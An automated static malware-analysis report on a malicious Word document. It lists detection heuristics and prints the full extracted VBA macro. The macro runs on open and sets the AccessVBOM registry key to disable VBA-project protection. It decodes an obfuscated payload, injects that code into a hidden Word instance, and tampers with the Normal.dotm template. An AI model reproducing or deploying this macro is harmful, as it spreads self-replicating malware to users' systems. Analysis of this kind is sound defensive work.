Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 e6cc542b690066cf…

MALICIOUS

Office (OOXML) / .DOCX

33.2 KB Created: 2022-02-06 12:21:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-18
MD5: 83b6030d3fa8f8efee3400440af230c6 SHA-1: 403d9437edbc1a3f32aaa5a63eea633dea57ea0a SHA-256: e6cc542b690066cf6914e88199ce234236f2d929f313af8b0b2f8babe43d4f7d
292 Risk Score

Heuristics 9

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        doc.VBProject.VBComponents(1).CodeModule.AddFromString (Putin(content))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3931 bytes
SHA-256: b59653f7efd6114374a51ef5a493b1fe85fa6af39c530598e519a53dcd2471ff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_Open()
    If ActiveDocument.ActiveWindow.View.Type <> wdPrintView Then
        ActiveDocument.ActiveWindow.View.Type = wdPrintView
    End If
    If ActiveDocument.ProtectionType <> wdNoProtection Then ActiveDocument.Unprotect _
       Password:="20exlnt20"
    alreadyLaunched = True
    Launch
End Sub
Private Sub Launch()
    If alreadyLaunched = True Then
        Exit Sub
    End If
    SubstitutePage
    Create_Word
    alreadyLaunched = True
End Sub
Sub Create_Word()
    CreateObject("Wscript.Shell").RegWrite "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
    Dim content As String
    content = UserForm1.TextBox1.Text
    DoEvents
    Set Wordy = Interaction.CreateObject("Word.Application")
    Wordy.DisplayAlerts = 0
    Wordy.Visible = 0
    Set doc = Wordy.Documents.Add("")
    doc.Saved = True
    doc.VBProject.VBComponents(1).CodeModule.AddFromString (Putin(content))
    doc.Close
    Wordy.Quit
    unlink
End Sub
Private Function Putin(i As String) As String
    Dim o As String
    i = Replace(i, "a", "0")
    i = Replace(i, "b", "1")
    i = Replace(i, "c", "2")
    i = Replace(i, "d", "3")
    i = Replace(i, "e", "4")
    i = Replace(i, "f", "5")
    i = Replace(i, "g", "6")
    i = Replace(i, "h", "7")
    i = Replace(i, "i", "8")
    i = Replace(i, "j", "9")
    For Counter = 1 To Len(i) Step 3
        o = o & Chr(Mid(i, Counter, 3))
    Next
    Putin = o
End Function
Private Sub SubstitutePage()
    Dim doc As Word.Document
    Dim firstPageRange As Range
    Dim rng As Range
    Dim autoTextTemplateName As String
    ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
    ActiveDocument.Background.Fill.ForeColor.RGB = RGB(255, 255, 255)
    ActiveDocument.Background.Fill.Solid
    autoTextTemplateName = "Doc"
    Set firstPageRange = Word.ActiveDocument.Range
    firstPageRange.Select
    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    Set doc = ActiveDocument
    Set rng = doc.Sections(1).Range
    doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
    doc.Save
End Sub
Sub unlink()
    Application.DisplayAlerts = False
    On Error GoTo Destroy
    ThisDocument.AttachedTemplate.Saved = True
    CurrUser = Application.UserName
    tmpLoc = "C:\Users\" & CurrUser & "\AppData\Roaming\Microsoft\Templates\Normal.dotm"
    ActiveDocument.AttachedTemplate = tmpLoc
    ActiveDocument.AttachedTemplate.Saved = True
    ActiveDocument.Save
    ThisDocument.Close savechanges:=False
Exit Sub
Destroy:
    Call ThisDocument.DeleteVBAPROJECT
    ActiveDocument.Save
    ActiveDocument.AttachedTemplate.Saved = True
    ThisDocument.Close savechanges:=False
End Sub
Sub DeleteVBAPROJECT()
    Application.DisplayAlerts = False
    Dim i As Long
    On Error Resume Next
    With ThisDocument.VBProject
        For i = .VBComponents.Count To 1 Step -1
            .VBComponents.Remove .VBComponents(i)
            .VBComponents(i).CodeModule.DeleteLines _
            1, .VBComponents(i).CodeModule.CountOfLines
        Next i
    End With
    On Error GoTo 0
    ActiveDocument.Save
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6B970FF8-CE7B-4350-8712-F0F5C75F6347}{305DCA27-0997-49DC-8534-BB044F26581B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 34816 bytes
SHA-256: 0696725ec2aacef47ab3746d3a785fad0d2dc48b71bcbf37aa8f0ed93f5bfc85
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.